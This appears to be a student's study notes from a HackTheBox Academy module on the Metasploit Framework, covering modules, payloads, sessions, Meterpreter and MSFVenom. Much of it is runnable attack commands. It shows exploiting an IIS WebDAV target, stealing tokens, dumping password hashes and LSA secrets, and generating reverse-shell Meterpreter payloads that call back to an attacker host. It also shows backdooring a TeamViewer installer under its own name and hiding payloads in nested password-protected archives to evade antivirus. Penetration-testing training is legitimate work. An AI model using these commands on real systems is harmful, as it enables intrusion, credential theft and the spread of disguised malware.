HackTheBox Academy - Using the Metasploit Framework

The Metasploit Framework is an open-source set of tools used for network enumeration, attacks, testing security vulnerabilities, evading detection, performing privilege escalation attacks, and performing post-exploitation.

Intro

• By default, all base file files related to Metasploit can be found in /usr/share/metasploit-framework

  # modules are split into separate categories in this folder.
  $ ls /usr/share/metasploit-framework/modules 
  auxiliary encoders evasion exploits nops payloads post
  
  # plugins offer us more flexibility by providubg more functionality and automation
  $ ls /usr/share/metasploit-framework/plugins/ 
  aggregator.rb ips_filter.rb openvas.rb sounds.rb alias.rb komand.rb pcap_log.rb sqlmap.rb auto_add_route.rb lab.rb request.rb thread.rb beholder.rb libnotify.rb rssfeed.rb token_adduser.rb db_credcollect.rb msfd.rb sample.rb token_hunter.rb db_tracker.rb msgrpc.rb session_notifier.rb wiki.rb event_tester.rb nessus.rb session_tagger.rb wmap.rb ffautoregen.rb nexpose.rb socket_logger.rb
  
  # meterpreter functionality and other useful scripts
  $ ls /usr/share/metasploit-framework/scripts/ 
  meterpreter ps resource shell
  
  # cmdline utilities that can be called directly from the msfconsole menu
  $ ls /usr/share/metasploit-framework/tools/ 
  context docs hardware modules payloads dev exploit memdump password recon

MSF Components

Modules

• modules are prepared scripts with a specific purpose and corresponding functions that have already been developed and tested in the wild.

• The Metasploit modules are structures into folders that look like this: <No.> <type>/<os>/<service>/<name>

• Module type consists of:

  • Auxiliary: Scanning, fuzzing, sniffing, and admin capabilities. Offer extra assistance and functionality.
  • Encoders: Ensure that payloads are intact to their destination.
  • Exploits: Defined as modules that exploit a vulnerability that will allow for the payload delivery.
  • NOPs: (No Operation code) Keep the payload sizes consistent across exploit attempts.
  • Payloads: Code runs remotely and calls back to the attacker machine to establish a connection (or shell).
  • Plugins: Additional scripts can be integrated within an assessment with msfconsole and coexist.
  • Post: Wide array of modules to gather information, pivot deeper, etc.

• When selecting a module for payload delivery only the following modules can be used as initiators:

  • Auxiliary
  • Exploits
  • Post

  # search function
  help search
  
  # searching for EternalRomance
  search eternalromance
  
  search eternalromance type:exploit
  
  # specific search
  search type:exploit platform:windows cve:2021 rank:excellent microsoft
  
  # select module
  use 0
  
  # see everything we're required to set
  options
  
  # module information
  info
  
  # target specification
  set RHOSTS 10.10.10.40
  
  # permament target specification
  setg RHOSTS 10.10.10.40
  
  # lhost specification
  setg LHOST 10.10.14.15
  
  # execute exploit
  run
  
  # get a shell
  shell

Targets

• Targets are unique operating system identifiers taken from the versions of those specific operating systems which adapt the selected exploit module to run on that particular version of the operating system.
• show targets command can be used in an exploit module to view all available vulnerable targets
• To identify a target correctly, we will need to:
  • Obtain a copy of the target binaries
  • Use msfpescan to locate a suitable return address

Payloads

• A Payload in Metasploit refers to a module that aids the exploit module in (typically) returning a shell to the attacker

• There are three different types of payload modules:

  • Singles
  • Stagers
  • Stages

• Whether or not a payload is staged is represented by / in the payload name; for example, windows/shell_bind_tcp is a single payload with no stage, whereas windows/shell/bind_tcp consists of a stager (bind_tcp) and a stage (shell).

• A Single payload contains the exploit and the entire shellcode for the selected task

  • they are more stable than their counterparts because they contain everything all-in-one.
  • some exploits will not support the resulting size of these payloads as they can get quite large

• Stager payloads work together with Stage payloads to perform a specific task

  • runs on the victim machine and initiates an outbound connection to the attacker’s listener, setting up the communication channel over which the subsequent stage payload is delivered
  •  are typically designed to be small and reliable

• Stages are payload components that are downloaded by stager’s modules

  • Stages provide advanced features with no size limits, such as Meterpreter, VNC Injection, and others

• Payload types:

  • generic/custom: Generic listener, multi-use
  • generic/shell_bind_tcp: Generic listener, multi-use, normal shell, TCP connection binding
  • generic/shell_reverse_tcp: Generic listener, multi-use, normal shell, reverse TCP connection
  • windows/x64/exec: Executes an arbitrary command (Windows x64)
  • windows/x64/loadlibrary: Loads an arbitrary x64 library path
  • windows/x64/messagebox: Spawns a dialog via MessageBox using a customizable title, text & icon
  • windows/x64/shell_reverse_tcp: Normal shell, single payload, reverse TCP connection
  • windows/x64/shell/reverse_tcp: Normal shell, stager + stage, reverse TCP connection
  • windows/x64/shell/bind_ipv6_tcp: Normal shell, stager + stage, IPv6 Bind TCP stager
  • windows/x64/meterpreter/$: Meterpreter payload + varieties above
  • windows/x64/powershell/$: Interactive PowerShell sessions + varieties above
  • windows/x64/vncinject/$: VNC Server (Reflective Injection) + varieties above

  # show payloads
  show payloads
  
  # filter search
  grep meterpreter show payloads
  
  grep meterpreter grep reverse_tcp show payloads
  
  # select payload
  set payload 15
  
  # see payload options
  show options

Encoders

• Encoders help with antivirus evasion
• can also help remove bad characters from the payload

  # without encoding
  msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl
  
  # with encoding
  msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
  
  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
  
  # using on an existing payload within msfconsole
  set payload 15
  
  show encoders
  
  # virustotal - check AV evasion
  msf-virustotal -k <API key> -f TeamViewerInstall.exe

Databases

• we can setup databases in msfconsole to keep track of results
• it has built-in support for PostgreSQL

# postgresql status
sudo service postgresql status

# start postgresql
sudo systemctl start postgresql

# init db - apt update if error occurs
sudo msfdb init

# check msfdb status
sudo msfdb status

# connect to the initiated db
sudo msfdb run

# reinitiate db
msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q
db_status

# database options
help database

Workspaces

• we can organize our Workspaces  which work the same way as folders in a project; We can segregate the different scan results, hosts, and extracted information by IP, subnet, network, or domain

# view current list of workspaces
workspace

# create new workspace
workspace -a Target_1

# select workspace
workspace Target_1

# workspace help menu
workspace -h

# import nmap scan results to workspace - .xml preferred
db_import Target.xml

# using nmap isinde msfconsole
db_nmap -sV -sS 10.10.10.8

# export workspace
db_export -h
db_export -f xml backup.xml

# stored hosts
hosts -h

# stored services
services -h

# stored credentials
creds -h

# stored loot
loot -h

Plugins

• Plugins are readily available software that has been released by third parties that have been integrated to msfconsole
• default directory of plugins is /usr/share/metasploit-framework/plugins

  # load nessus
  msf6 > load nessus
  
  msf6 > nessus_help
  
  # download msf plugins
  git clone https://github.com/darkoperator/Metasploit-Plugins
  sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb
  msfconsole -q
  msf6 > load pentest

  nMap (pre-installed)	NexPose (pre-installed)	Nessus (pre-installed)
  Mimikatz (pre-installed V.1)	Stdapi (pre-installed)	Railgun
  Priv	Incognito (pre-installed)	Darkoperator’s

MSF Sessions

Sessions

• Sessions create dedicated control interfaces for all of our deployed modules
• to background a session, we can use [CTRL] + [Z] key combination or by typing the background command in the case of Meterpreter stages

  # list active sessions
  sessions
  
  # interact with a session
  sessions -i 1

Jobs

• We would need to use the jobs command to look at the currently active tasks running in the background and terminate the old ones to free up the port.

• Other types of tasks inside sessions can also be converted into jobs to run in the background seamlessly, even if the session dies or disappears.

  jobs -h
  
  # run exploit as a background job
  exploit -j
  
  # list running jobs
  jobs -l
  
  # kill a running job
  kill 1
  
  # kill all jobs
  jobs -K

Meterpreter

• Meterpreter is used to get direct shell on the target OS but with more functionality
• resides entirely in memory and writes nothing to the disk
• uses channelized communication system between the target host and the attacker; allows for AES-encrypted traffic
• can constantly be augmented at runtime and loaded over the network

# scan target
db_nmap -sV -p- -T5 -A 10.10.10.15
hosts
services

# search for exploit
search iis_webdav_upload_asp
use 0

# configure exploit & payload
set RHOST 10.10.10.15
set LHOST tun0
run

# meterpreter migration
getuid
ps
steal_token 1836

# session handling
bg
search local_exploit_suggester
use 0
set SESSION 1
run

# dump hashes
hashdump
lsa_dump_sam

# lsa secrets dump
lsa_dump_secrets

Additional Features

Importing Modules

• We can search for Metasploit custom exploits from ExploitDB or using searchsploit
• Custom modules, scripts and plugins can be stored in /usr/share/metasploit-framework and this folder is also symlinked in our home and root folders in ~/.msf4/

cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb

cp ~/Downloads/9861.rb ~/.msf4/modules/exploits/unix/webapp/nagios3_command_injection.rb

MSFVenom

Evasion Techniques

• we can hide the payload shellcode deep within the legitimate code of the actual product
• We do so with the -k flag, However, the target will only notice the running backdoor if they launch the backdoored executable template from a CLI environment

# embed payloads into any executable file
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

Archives

• Archiving a piece of information such as a file, folder, script, executable, picture, or document and placing a password on the archive bypasses a lot of common anti-virus signatures

# generate payload
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

# install rar utility
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar

# archive test.js
rar a ~/test.rar -p ~/test.js

# remove .rar extension
mv test.rar test

# archive payload again
rar a test2.rar -p test

# remove .rar extension again
mv test2.rar test2

# virustotal shows 0 detection

Packers

• The term Packer refers to the result of an executable compression process where the payload is packed together with an executable program and with the decompression code in one single file
• Popular packer software:
  • UPX packer
  • The Enigma Protector
  • MPRESS
  • Alternate EXE Packer
  • ExeStealth
  • Morphine
  • MEW
  • Themida
• PolyPack project to learn about packers